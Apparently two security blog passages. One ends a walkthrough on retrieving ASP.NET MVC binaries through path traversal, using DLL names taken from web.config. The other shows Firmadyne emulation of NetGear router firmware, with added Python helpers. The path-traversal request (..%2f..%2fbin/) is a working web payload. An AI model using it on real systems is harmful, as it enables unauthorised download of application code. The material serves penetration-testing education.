<span style="background-color: white; font-family: "courier new" , "courier" , monospace;">Views/Web.config: <sectionGroup name="system.web.webPages.razor" <span style="color: #c7254e;"><span style="background-color: #f9f2f4;"><b>type</b></span></span>="System.Web.WebPages.Razor.Configuration.RazorWebSectionGroup, <span style="color: #c7254e;"><span style="background-color: #f9f2f4;"><b>System.Web.WebPages.Razor</b></span></span>, Version=3.0.0.0, Culture=neutral</span><br />
<span style="background-color: white; font-family: "courier new" , "courier" , monospace;">Views/Web.config: <section name="host" <span style="color: #c7254e;"><span style="background-color: #f9f2f4;"><b>type</b></span></span>="System.Web.WebPages.Razor.Configuration.HostSection, <span style="color: #c7254e;"><span style="background-color: #f9f2f4;"><b>System.Web.WebPages.Razor</b></span></span>, Version=3.0.0.0, Culture=neutral</span><br />
<span style="background-color: white; font-family: "courier new" , "courier" , monospace;">Views/Web.config: <section name="pages" <span style="background-color: #f9f2f4;"><span style="color: #c7254e;"><b>type</b></span></span>="System.Web.WebPages.Razor.Configuration.RazorPagesSection, <span style="background-color: #f9f2f4;"><span style="color: #c7254e;"><b>System.Web.WebPages.Razor</b></span></span>, Version=3.0.0.0, Culture=neutral</span><br />
<span style="background-color: white; font-family: "courier new" , "courier" , monospace;">Views/Web.config: <add name="BlockViewHandler" path="*</span><br />
<span style="background-color: white; font-family: "courier new" , "courier" , monospace;">Web.config: <section name="entityFramework" <span style="background-color: #f9f2f4;"><span style="color: #c7254e;"><b>type</b></span></span>="System.Data.Entity.Internal.ConfigFile.EntityFrameworkSection, <span style="background-color: #f9f2f4;"><span style="color: #c7254e;"><b>EntityFramework</b></span></span>, Version=6.0.0.0, Culture=neutral</span><br />
<span style="background-color: white; font-family: "courier new" , "courier" , monospace;">Web.config: <defaultConnectionFactory <span style="background-color: #f9f2f4;"><span style="color: #c7254e;"><b>type</b></span></span>="System.Data.Entity.Infrastructure.LocalDbConnectionFactory, <span style="background-color: #f9f2f4;"><span style="color: #c7254e;"><b>EntityFramework</b></span></span>"></span><br />
<span style="background-color: white; font-family: "courier new" , "courier" , monospace;">Web.config: <provider invariantName="System.Data.SqlClient" <span style="background-color: #f9f2f4;"><span style="color: #c7254e;"><b>type</b></span></span>="System.Data.Entity.SqlServer.SqlProviderServices, <span style="background-color: #f9f2f4;"><span style="color: #c7254e;"><b>EntityFramework.SqlServer</b></span></span></span><br />
<br />
Thus, several files can be downloaded: <br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwndEXx1W_9vmjTStwLXwA-jBg5JhKpZrYhlK8T_bUb5julOvhK2pXnLaSe-RYbmrWqTLBm-W5BUly8xHn5_zqcl9s_a-RE-T2LqROIrkkggVDHKSYPxb8I7iaCeh3bDDBBpyistXRnjzf/s1600/6.png" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" data-original-height="682" data-original-width="269" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwndEXx1W_9vmjTStwLXwA-jBg5JhKpZrYhlK8T_bUb5julOvhK2pXnLaSe-RYbmrWqTLBm-W5BUly8xHn5_zqcl9s_a-RE-T2LqROIrkkggVDHKSYPxb8I7iaCeh3bDDBBpyistXRnjzf/s1600/6.png" /></a>
<ul>
<li>EntityFramework.dll</li>
<li>EntityFramework.SqlServer.dll</li>
<li>Microsoft.Owin.dll</li>
<li>Microsoft.Owin.Security.dll</li>
<li>Microsoft.Owin.Security.Cookies.dll</li>
<li>Microsoft.Owin.Security.OAuth.dll</li>
<li>Newtonsoft.Json.dll</li>
<li>System.Web.Helpers.dll</li>
<li>System.Web.Mvc.dll</li>
<li>System.Web.Mvc.Ajax.dll</li>
<li>System.Web.Mvc.Html.dll</li>
<li>System.Web.Optimization.dll</li>
<li>System.Web.Routing.dll</li>
<li>System.Web.WebPages.dll</li>
<li>System.Web.WebPages.Razor.dll</li>
<li>WebApplication1.dll</li>
<li><b>WebApplication1.AdditionalFeatures.dll</b></li>
<li>WebGrease.dll</li>
</ul>
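<div style="text-align: justify;">
The three grep passes above can be collapsed into one XML-aware pass. The following Python script is an added example, not code from the original post: it reads two constructed web.config samples modelled on the output shown above (the file names and the trimmed content are assumptions), collects every <i>namespace</i>, <i>assemblyIdentity</i> and assembly-qualified <i>type</i>-like attribute, and returns the candidate DLL names together with where each was declared. It goes slightly beyond the cheat-sheet by also reading attributes such as <i>factoryType</i> and by handling the XML namespace that <i>assemblyBinding</i> puts on <i>assemblyIdentity</i>, which a plain grep ignores.</div>

```python
"""Enumerate the DLL names that a set of web.config files gives away.

Added example, not code from the original post: it replaces the three grep
one-liners of the cheat-sheet (namespace, assemblyIdentity, " type=") with one
XML-aware pass and additionally reads attributes such as factoryType whose
value is an assembly-qualified type name. The two configuration documents
below are constructed samples modelled on the post's output; the file names
are assumptions.
"""
import xml.etree.ElementTree as ET

# Constructed sample: a trimmed Views/Web.config.
VIEWS_WEB_CONFIG = """<?xml version="1.0"?>
<configuration>
  <configSections>
    <sectionGroup name="system.web.webPages.razor" type="System.Web.WebPages.Razor.Configuration.RazorWebSectionGroup, System.Web.WebPages.Razor, Version=3.0.0.0, Culture=neutral">
      <section name="host" type="System.Web.WebPages.Razor.Configuration.HostSection, System.Web.WebPages.Razor, Version=3.0.0.0, Culture=neutral" requirePermission="false" />
    </sectionGroup>
  </configSections>
  <system.web.webPages.razor>
    <host factoryType="System.Web.Mvc.MvcWebRazorHostFactory, System.Web.Mvc, Version=5.2.3.0, Culture=neutral" />
    <pages pageBaseType="System.Web.Mvc.WebViewPage">
      <namespaces>
        <add namespace="System.Web.Mvc" />
        <add namespace="WebApplication1.AdditionalFeatures" />
      </namespaces>
    </pages>
  </system.web.webPages.razor>
  <system.webServer>
    <handlers>
      <add name="BlockViewHandler" path="*" verb="*" preCondition="integratedMode" type="System.Web.HttpNotFoundHandler" />
    </handlers>
  </system.webServer>
</configuration>
"""

# Constructed sample: the relevant parts of the main Web.config.
MAIN_WEB_CONFIG = """<?xml version="1.0"?>
<configuration>
  <configSections>
    <section name="entityFramework" type="System.Data.Entity.Internal.ConfigFile.EntityFrameworkSection, EntityFramework, Version=6.0.0.0, Culture=neutral" requirePermission="false" />
  </configSections>
  <runtime>
    <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">
      <dependentAssembly>
        <assemblyIdentity name="Newtonsoft.Json" />
        <bindingRedirect oldVersion="0.0.0.0-10.0.0.0" newVersion="10.0.0.0" />
      </dependentAssembly>
      <dependentAssembly>
        <assemblyIdentity name="System.Web.Mvc" />
        <bindingRedirect oldVersion="0.0.0.0-5.2.3.0" newVersion="5.2.3.0" />
      </dependentAssembly>
    </assemblyBinding>
  </runtime>
  <entityFramework>
    <defaultConnectionFactory type="System.Data.Entity.Infrastructure.LocalDbConnectionFactory, EntityFramework" />
    <providers>
      <provider invariantName="System.Data.SqlClient" type="System.Data.Entity.SqlServer.SqlProviderServices, EntityFramework.SqlServer" />
    </providers>
  </entityFramework>
</configuration>
"""


def _local(name):
    """Strip an XML namespace, e.g. '{urn:schemas-microsoft-com:asm.v1}assemblyIdentity'."""
    return name.rsplit("}", 1)[-1]


def assembly_of(qualified_type):
    """'Ns.Type, Assembly, Version=...' -> 'Assembly'; None when no assembly part is given."""
    parts = [p.strip() for p in qualified_type.split(",")]
    if len(parts) < 2 or not parts[1] or "=" in parts[1]:
        return None
    return parts[1]


def extract_candidates(configs):
    """Map each candidate DLL base name to the places it was declared.

    configs: {file name: web.config XML text}. Result has the form
    {"System.Web.Mvc": ["Views/Web.config:namespace", ...], ...}.
    """
    found = {}

    def note(name, source):
        found.setdefault(name, set()).add(source)

    for filename, text in configs.items():
        for elem in ET.fromstring(text).iter():
            tag = _local(elem.tag)
            for attr, value in elem.attrib.items():
                attr_name = _local(attr)
                if tag == "add" and attr_name == "namespace":
                    note(value, f"{filename}:namespace")
                elif tag == "assemblyIdentity" and attr_name == "name":
                    note(value, f"{filename}:assemblyIdentity")
                elif attr_name.lower().endswith("type"):
                    # sectionGroup/section/provider "type", host "factoryType", ...
                    # A value without an assembly part (e.g. System.Web.HttpNotFoundHandler
                    # or the pageBaseType) names no DLL of its own and is skipped.
                    assembly = assembly_of(value)
                    if assembly:
                        note(assembly, f"{filename}:{attr_name}")
    return {name: sorted(sources) for name, sources in found.items()}


def candidate_dll_names(configs):
    """Sorted '<name>.dll' list: what an exposed set of web.config files reveals."""
    return [name + ".dll" for name in sorted(extract_candidates(configs))]


SAMPLE_CONFIGS = {"Web.config": MAIN_WEB_CONFIG, "Views/Web.config": VIEWS_WEB_CONFIG}

if __name__ == "__main__":
    for name, sources in sorted(extract_candidates(SAMPLE_CONFIGS).items()):
        print(f"{name + '.dll':40} <- {', '.join(sources)}")
```

<div style="text-align: justify;">
A namespace entry is only a candidate: a namespace does not necessarily correspond to a DLL of the same name, which is why the list produced by the post, and by this script, has to be verified against what is actually present. From the defensive side, the output is a concise inventory of what an exposed configuration file discloses about the application's binaries.</div>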
<br />
Example of request:<br />
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">GET /download_page?id=..%2f..%2fbin/<DLL NAME>.dll HTTP/1.1</span><br />
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">Host: example-mvc-application.minded</span><br />
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">[...]</span><br />
<br />
<div style="text-align: justify;">
<div style="text-align: justify;">
For the sake of completeness, it must be said that these steps only allow an attacker to start a grey-box analysis of the web application: the /bin folder of the target application also contains several additional DLLs that are referenced only by inner libraries, and the configuration files do not reveal them.</div>
</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
To show the gap between the actual /bin folder content and the result of the described technique, the picture shows the real content of the folder from the internal perspective.</div>
<br />
<div style="text-align: justify;">
Moreover, the downloaded DLL files can be treated like any other DLL: their dependencies can be listed and they can be decompiled for a deeper investigation.</div>
<br />
<br />
<h3>
References</h3>
<ul>
<li>https://msdn.microsoft.com/en-us/library/w7w4sb0w.aspx</li>
<li>https://docs.microsoft.com/it-it/aspnet/core/mvc/controllers/areas?view=aspnetcore-2.1</li>
<li>https://www.infragistics.com/community/blogs/b/dhananjay_kumar/posts/areas-in-asp-net-mvc</li>
<li>https://www.red-gate.com/products/dotnet-development/reflector/index</li>
<li>https://visualstudiomagazine.com/articles/2014/10/28/asp-net-mvc-5-1-new.aspx</li>
<li>https://www.davidhayden.me/blog/asp-net-mvc-5-attribute-routing</li>
<li>https://www.c-sharpcorner.com/article/learn-about-razor-view-engine/</li>
<li>https://www.ecanarys.com/Blogs/ArticleID/271/THE-RAZOR-VIEW-ENGINE-IN-MVC</li>
</ul>
</div>
</div>
<div style="text-align: justify;">
Author: Fabrizio Bugli</div>
<br />
<div>
<h3>
Pentesting IoT devices (Part 2: Dynamic Analysis)</h3>
<div style="text-align: justify;">
Published 2018-10-02.</div>
<div>
<div style="text-align: justify;">
This is the second part of our Pentesting IoT devices guide. The <a href="https://blog.mindedsecurity.com/2018/09/a-practical-guide-to-testing-security.html" target="_blank">previous post</a> gave an overview of firmware static analysis and showed how it can help to find many security issues. This article discusses the so-called dynamic approach to device pentesting, and describes how firmware emulation makes it possible to test devices, and to improve a pentester's skills, without physically having them.<br />
<div>
<br /></div>
</div>
</div>
<h3>
Dynamic Analysis</h3>
</div>
<div>
<div style="text-align: justify;">
The dynamic test of a device, from a security perspective, includes different activities, and each of them has its own testing methodology. For example, after a preliminary recon phase against a device, a tester may face different services such as a web server, an FTP service and even an unknown open port belonging to a custom communication protocol. In this case it is important to split the test scenarios and apply a different methodology to each class of service. A good approach is to test the web interface for the typical web vulnerabilities, then focus on the FTP service and, finally, study the custom protocol by sniffing the device traffic or by fuzzing it.<br />
The <a href="https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoT_Attack_Surface_Areas">OWASP IoT attack surface areas</a> provide a useful checklist that helps pentesters focus and prioritize their analysis.<br />
<br />
Since it is not possible to describe every dynamic analysis a tester could perform against a device, this article focuses on showing an effective way to emulate an IoT device.<br />
<br />
<h3 style="text-align: start;">
Firmware Emulation</h3>
The possibility of emulating a device starting from its firmware allows researchers to perform any kind of dynamic test against it without having the physical device and without worrying about bricking it. This kind of analysis is very effective in consultancy activities, because sometimes it is necessary to work under particular circumstances: for example, when testing the real device is not allowed because it is a production device, or when getting the physical device is impossible because it is installed in an unreachable place, while a copy of the device firmware and a suitable emulator are available. The main limitation of this technique is that <b>not all device firmwares and architectures can be easily emulated</b>.<br />
<br /></div>
</div>
<div>
<h4>
Firmadyne</h4>
</div>
<div>
<div style="text-align: justify;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjp5grN0IDcF3qiIKq7reuhU9KTAZ086fAqRRwmcKse76mo97oXZDkTVND8rXDBTVPQHJcmLGCq2_w8LgkvUbpx1yEl7DlQUkeCXkFlOuBQ202HRLx-nw-xva8KANU8q7sjq7gc0DGGWzZr/s1600/architecture.png" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" data-original-height="549" data-original-width="830" height="262" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjp5grN0IDcF3qiIKq7reuhU9KTAZ086fAqRRwmcKse76mo97oXZDkTVND8rXDBTVPQHJcmLGCq2_w8LgkvUbpx1yEl7DlQUkeCXkFlOuBQ202HRLx-nw-xva8KANU8q7sjq7gc0DGGWzZr/s400/architecture.png" style="border: 1pt solid rgb(0, 0, 0);" width="400" /></a>Firmadyne is a tool which allows you to emulate, thanks to <a href="https://www.qemu.org/">QEMU</a>, a Linux-based firmware and perform basic dynamic analysis against it.<br />
<br />
<div style="text-align: justify;">
<div style="margin: 0px;">
As stated on its own <a href="https://github.com/firmadyne/firmadyne">GitHub page</a>: <i>“FIRMADYNE is an automated and scalable system for performing emulation and dynamic analysis of Linux-based embedded firmware.”</i></div>
</div>
<br />
The aim of this software is to provide an automated way of testing a large number of firmwares with test cases such as <i>nmap</i> service discovery, <i>snmpwalk</i> or <i>metasploit</i>.<br />
Currently it supports the emulation of three CPU architecture and endianness combinations:<br />
<ul>
<li>little-endian ARM</li>
<li>little-endian MIPS </li>
<li>big-endian MIPS</li>
</ul>
</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Below, a step-by-step usage example of Firmadyne is shown, using the NetGear WN604 router <a href="http://www.downloads.netgear.com/files/GDC/WN604/WN604%20Firmware%20Version%202.0.1.zip">firmware</a> as the test case.<br />
<br /></div>
<div style="text-align: justify;">
The first step consists in extracting the firmware, which Firmadyne accomplishes with the <i>extractor.py</i> script. This operation creates a zipped version of the firmware filesystem inside the <i>images</i> folder.</div>
<div style="text-align: justify;">
<br /></div>
</div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">$ <i>./sources/extractor/extractor.py -b netgear -sql 127.0.0.1 -np -nk "<b>WN604 Firmware Version 2.0.1.zip</b>" images</i></span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">>> Database Image ID: 20</span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">>> MD5: f961fcc6d198940c2aaebb18b836f795</span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">>> Tag: 20</span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">>> Temp: /tmp/tmpZDScTD</span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">>> Status: Kernel: True, Rootfs: False, Do_Kernel: False, Do_Rootfs: True</span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">>>>> Zip archive data, at least v2.0 to extract, compressed size: 710, uncompressed size: 1351, name: ReleaseNotes_WN604_fw_2.0.1.html</span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">>> Recursing into archive ...</span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">[. . .]</span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">/tmp/tmpSVfpkn/_WN604_V2.0.1_firmware.tar.extracted/rootfs.squashfs</span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;"><span style="white-space: pre;"> </span>>> MD5: fb9c11e075a37a8a5c989743897e8735</span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;"><span style="white-space: pre;"> </span>>> Tag: 20</span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;"><span style="white-space: pre;"> </span>>> Temp: /tmp/tmpWfQ7yl</span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;"><span style="white-space: pre;"> </span>>> Status: Kernel: True, Rootfs: False, Do_Kernel: False, Do_Rootfs: True</span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;"><span style="white-space: pre;"> </span>>> Recursing into archive ...</span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;"><span style="white-space: pre;"> </span>>>>> Squashfs filesystem, big endian, lzma signature, version 3.1, size: 2333384 bytes, 650 inodes, blocksize: 131072 bytes, created: 2010-03-26 11:55:15</span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;"><span style="white-space: pre;"> </span>>>>> <b>Found Linux filesystem in /tmp/tmpWfQ7yl/_rootfs.squashfs.extracted/squashfs-root!</b></span></div>
<div>
<br /></div>
<div>
<div style="text-align: justify;">
The second step is identifying the device architecture and storing the result in the database (note that the number 20 is the image ID Firmadyne assigned to this firmware).</div>
</div>
<div>
<br /></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">$ <i>./scripts/getArch.sh ./images/20.tar.gz</i> </span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">./bin/busybox: <b>mipseb</b></span></div>
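<div style="text-align: justify;">
What <i>getArch.sh</i> reads off <i>./bin/busybox</i> is the ELF header of the binary. The following Python script is an added example, not part of Firmadyne or of the original post: it parses the first 20 bytes of each file in an extracted root filesystem (the sample headers are constructed byte strings, not bytes taken from the NetGear firmware), derives a label such as <b>mipseb</b> from the data-encoding byte and the e_machine field, takes a majority vote across the binaries, and reports whether the result is one of the three combinations listed above as supported by Firmadyne. It is a useful first check before spending time on an emulation attempt that cannot succeed.</div>

```python
"""Identify firmware CPU architecture and endianness from ELF headers.

Added example, not part of Firmadyne or of the original post. It does by
hand what getArch.sh obtains for ./bin/busybox: reads the ELF identification
bytes and the e_machine field, and builds a label such as 'mipseb'. The
sample root filesystem below is a constructed dict of path -> file bytes.
"""
from collections import Counter
from dataclasses import dataclass
from typing import Dict, Optional

ELF_MAGIC = b"\x7fELF"
ELFCLASS32, ELFCLASS64 = 1, 2      # e_ident[EI_CLASS]
ELFDATA2LSB, ELFDATA2MSB = 1, 2    # e_ident[EI_DATA]: little / big endian

# e_machine values from the ELF specification for the families of interest.
E_MACHINE = {0x03: "x86", 0x08: "mips", 0x28: "arm", 0x3E: "x86_64", 0xB7: "aarch64"}

# The three combinations the post lists as emulatable by Firmadyne.
FIRMADYNE_ARCHES = {"armel", "mipsel", "mipseb"}


@dataclass(frozen=True)
class ElfInfo:
    family: str
    bits: int
    big_endian: bool

    @property
    def label(self) -> str:
        """Firmadyne-style label: family plus 'eb' (big) or 'el' (little endian)."""
        return self.family + ("eb" if self.big_endian else "el")


def parse_elf_header(data: bytes) -> Optional[ElfInfo]:
    """Parse the first 20 bytes of an ELF file; None for non-ELF or malformed input."""
    if len(data) < 20 or data[:4] != ELF_MAGIC:
        return None
    ei_class, ei_data = data[4], data[5]
    if ei_class not in (ELFCLASS32, ELFCLASS64) or ei_data not in (ELFDATA2LSB, ELFDATA2MSB):
        return None
    big_endian = ei_data == ELFDATA2MSB
    # e_type occupies bytes 16-17 and e_machine bytes 18-19 in both ELF32 and
    # ELF64, stored in the byte order announced by e_ident[EI_DATA].
    e_machine = int.from_bytes(data[18:20], "big" if big_endian else "little")
    family = E_MACHINE.get(e_machine, f"unknown-0x{e_machine:02x}")
    return ElfInfo(family, 32 if ei_class == ELFCLASS32 else 64, big_endian)


def firmware_arch(files: Dict[str, bytes]) -> Optional[str]:
    """Majority vote over every ELF file in an extracted root filesystem."""
    votes = Counter()
    for data in files.values():
        info = parse_elf_header(data)
        if info is not None:
            votes[info.label] += 1
    return votes.most_common(1)[0][0] if votes else None


def firmadyne_supported(label: Optional[str]) -> bool:
    return label in FIRMADYNE_ARCHES


def _header(ei_class: int, ei_data: int, e_type: int, e_machine: int) -> bytes:
    """Build a minimal 20-byte ELF header for the constructed samples."""
    order = "big" if ei_data == ELFDATA2MSB else "little"
    ident = ELF_MAGIC + bytes([ei_class, ei_data, 1]) + b"\x00" * 9   # 16 bytes of e_ident
    return ident + e_type.to_bytes(2, order) + e_machine.to_bytes(2, order)


# Constructed sample: a big-endian MIPS root filesystem plus one shell script.
SAMPLE_ROOTFS = {
    "bin/busybox": _header(ELFCLASS32, ELFDATA2MSB, 2, 0x08),    # ET_EXEC, EM_MIPS
    "usr/sbin/httpd": _header(ELFCLASS32, ELFDATA2MSB, 2, 0x08),
    "lib/libc.so.0": _header(ELFCLASS32, ELFDATA2MSB, 3, 0x08),  # ET_DYN, EM_MIPS
    "etc/init.d/rcS": b"#!/bin/sh\necho boot\n",                   # not an ELF file
}

if __name__ == "__main__":
    for path, data in SAMPLE_ROOTFS.items():
        info = parse_elf_header(data)
        print(f"{path:16} {info.label if info else 'not ELF'}")
    arch = firmware_arch(SAMPLE_ROOTFS)
    print("firmware:", arch, "(Firmadyne: %s)" % ("yes" if firmadyne_supported(arch) else "no"))
```

<div style="text-align: justify;">
The majority vote is a simplification: Firmadyne's script looks at a fixed list of well-known binaries, while this example treats every ELF file equally, which is good enough to flag a root filesystem whose binaries are not uniformly built for one target.</div>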
<div>
<br /></div>
<div>
The third step is loading the content of the filesystem into the database and then creating a <i>QEMU</i> disk image with the <i>makeImage.sh</i> script.</div>
<div>
<br /></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">$ <i>./scripts/tar2db.py -i 20 -f ./images/20.tar.gz</i> </span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">$ <i>sudo ./scripts/makeImage.sh 20</i></span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">Querying database for architecture... Password for user firmadyne: </span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;"><b>mipseb</b></span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">----Running----</span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">----Copying Filesystem Tarball----</span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">----Creating QEMU Image----</span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">Formatting '/home/lcomi/work/clients/minded/firmadyne//scratch//20//image.raw', fmt=raw size=1073741824</span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">----Creating Partition Table----</span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">Welcome to fdisk (util-linux 2.31.1).</span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">Changes will remain in memory only, until you decide to write them.</span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">[. . .]</span></div>
<div>
<br /></div>
<div>
<div style="text-align: justify;">
Once the image is ready, it is time to infer the firmware's network configuration.</div>
</div>
<div>
<br /></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">$ sudo ./scripts/inferNetwork.sh 20</span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">Querying database for architecture... Password for user firmadyne: </span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">mipseb</span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">Running firmware 20: terminating after 120 secs...</span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">qemu-system-mips: -net nic,vlan=0: 'vlan' is deprecated. Please use 'netdev' instead.</span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">Bad SWSTYLE=0x04</span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">qemu-system-mips: terminating on signal 2 from pid 19371 (timeout)</span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">Inferring network...</span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">Interfaces: [(<b>'brtrunk', '192.168.0.100'</b>)]</span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">Done!</span></div>
<div>
<br />
<div style="text-align: justify;">
<b>Note</b>: if <i>inferNetwork.sh</i> cannot identify any interface for the aforementioned firmware, it may be necessary to patch the Firmadyne script as described in <a href="https://github.com/firmadyne/firmadyne/issues/89">this issue</a>.<br />
<br /></div>
<div style="text-align: justify;">
Finally, it is possible to launch the firmware emulation with the <i style="font-family: "times new roman";">run.sh</i> script.</div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;"><br /></span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">$ sudo ./scratch/20/run.sh</span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">Creating TAP device tap20_0...</span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">Set 'tap20_0' persistent and owned by uid 0</span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">Bringing up TAP device...</span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">Adding route to 192.168.0.100...</span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">Starting firmware emulation... use Ctrl-a + x to exit</span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">qemu-system-mips: -net nic,vlan=0: 'vlan' is deprecated. Please use 'netdev' instead.</span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">[ 0.000000] Linux version 2.6.32.70 (vagrant@vagrant-ubuntu-trusty-64) (gcc version 5.3.0 (GCC) ) #1 Thu Feb 18 01:39:21 UTC 2016</span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">[ 0.000000] </span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">[ 0.000000] LINUX started...</span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">[ 0.000000] bootconsole [early0] enabled</span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">[ 0.000000] CPU revision is: 00019300 (MIPS 24Kc)</span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">[ 0.000000] FPU revision is: 00739300</span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">[ 0.000000] Determined physical RAM map:</span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">[ 0.000000] memory: 00001000 @ 00000000 (reserved)</span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">[ 0.000000] memory: 000ef000 @ 00001000 (ROM data)</span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">[ 0.000000] memory: 0061e000 @ 000f0000 (reserved)</span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">[ 0.000000] memory: 0f8f1000 @ 0070e000 (usable)</span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">[ 0.000000] debug: ignoring loglevel setting.</span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">[. . .]</span></div>
<div>
<br /></div>
<div>
<div style="text-align: justify;">
As can be seen from the nmap output and from the following picture, all the device services are available over the network at IP address 192.168.0.100, and they can be analyzed with the scripts included in Firmadyne's <span style="font-family: "times" , "times new roman" , serif;"><i>analysis</i></span> folder.</div>
</div>
<div>
